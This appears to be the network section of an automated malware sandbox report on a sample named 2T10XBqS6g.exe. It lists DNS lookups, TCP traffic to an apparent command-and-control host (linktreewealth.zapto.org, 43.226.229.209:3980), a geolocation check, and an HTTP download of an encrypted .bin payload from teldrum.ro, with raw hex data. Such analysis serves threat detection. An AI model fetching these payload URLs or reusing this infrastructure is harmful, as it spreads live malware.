                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837181091 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837284088 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837354898 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837407112 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837522984 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837524891 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837656021 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837694883 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837754965 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.838033915 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.364911079 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.364973068 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365096092 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365156889 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365189075 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365317106 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365425110 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365495920 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365536928 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365664959 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365669012 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365716934 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.365897894 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366004944 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366018057 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366106033 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366182089 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366193056 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366326094 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366353035 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366434097 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366610050 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366695881 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366724968 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366770029 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366869926 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.366933107 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367017984 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367039919 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367089033 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367194891 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367248058 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367355108 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367458105 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367574930 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367691040 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367698908 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367700100 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367837906 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.367923975 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368026018 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368050098 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368154049 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368196011 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368284941 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368366957 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368416071 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368521929 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368657112 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368705988 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368746042 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368858099 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368870974 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.368974924 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369101048 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369200945 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369210958 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369333029 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369370937 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369437933 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369537115 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369565964 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369683981 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369805098 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369879007 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.369911909 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370034933 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370049000 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370160103 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370218039 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370294094 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370385885 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370498896 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370558977 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370615959 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370727062 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370738983 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370851040 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370898008 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.370975971 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371068954 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371200085 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371242046 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371311903 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371416092 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371438980 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371562004 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371670961 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371751070 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371792078 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371891022 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.371923923 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372039080 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372087955 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372140884 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372251034 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372374058 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372430086 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372486115 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372600079 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372611046 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372715950 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372769117 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372833967 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.372946978 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373073101 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373111010 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373188019 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373281002 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373307943 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373420000 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373446941 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373560905 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373656988 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373779058 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373789072 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373828888 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.373961926 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:39.406110048 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.244067907 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.244107962 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.244196892 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.789174080 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.789191008 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.789486885 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.789530993 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.789596081 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.789612055 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:43.789880991 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:44.334498882 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:44.334897041 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:44.342472076 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:44.342683077 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:44.883936882 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:44.884155989 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:45.428993940 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:07:01.437056065 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:07:01.439430952 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:07:02.024949074 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:07:31.438518047 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:07:31.440668106 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:07:32.026734114 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:08:01.441426992 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:08:01.442850113 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:08:02.028386116 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:25.059456110 CET5554953192.168.11.201.1.1.1
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:25.491911888 CET53555491.1.1.1192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:33.763075113 CET6193953192.168.11.201.1.1.1
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:33.864902020 CET53619391.1.1.1192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.518598080 CET6036053192.168.11.201.1.1.1
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.621058941 CET53603601.1.1.1192.168.11.20
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:25.059456110 CET192.168.11.201.1.1.10x2e8cStandard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:33.763075113 CET192.168.11.201.1.1.10xc1f2Standard query (0)linktreewealth.zapto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.518598080 CET192.168.11.201.1.1.10x548eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:25.491911888 CET1.1.1.1192.168.11.200x2e8cNo error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:33.864902020 CET1.1.1.1192.168.11.200xc1f2No error (0)linktreewealth.zapto.org43.226.229.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.621058941 CET1.1.1.1192.168.11.200x548eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  • teldrum.ro
                                                                                                                                                                                                                                  • geoplugin.net
                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  0192.168.11.2049769178.237.33.50805392C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.804280996 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.990336895 CET1196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  date: Tue, 14 Jan 2025 10:06:35 GMT
                                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                                  content-length: 988
                                                                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 34 39 2e 37 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f [TRUNCATED]
                                                                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"154.16.49.79", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Washington", "geoplugin_region":"District of Columbia", "geoplugin_regionCode":"DC", "geoplugin_regionName":"District of Columbia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.894", "geoplugin_longitude":"-77.0365", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  0192.168.11.2049765109.99.162.144435392C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC173OUTGET /NJrdZqNcCtz102.bin HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                  Host: teldrum.ro
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 10:06:26 GMT
                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                  Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Content-Length: 493632
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC7969INData Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1
                                                                                                                                                                                                                                  Data Ascii: |ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca
                                                                                                                                                                                                                                  Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64
                                                                                                                                                                                                                                  Data Ascii: sC#up:{k|Y-NlQu,tYTr :}o*@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^*d
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1
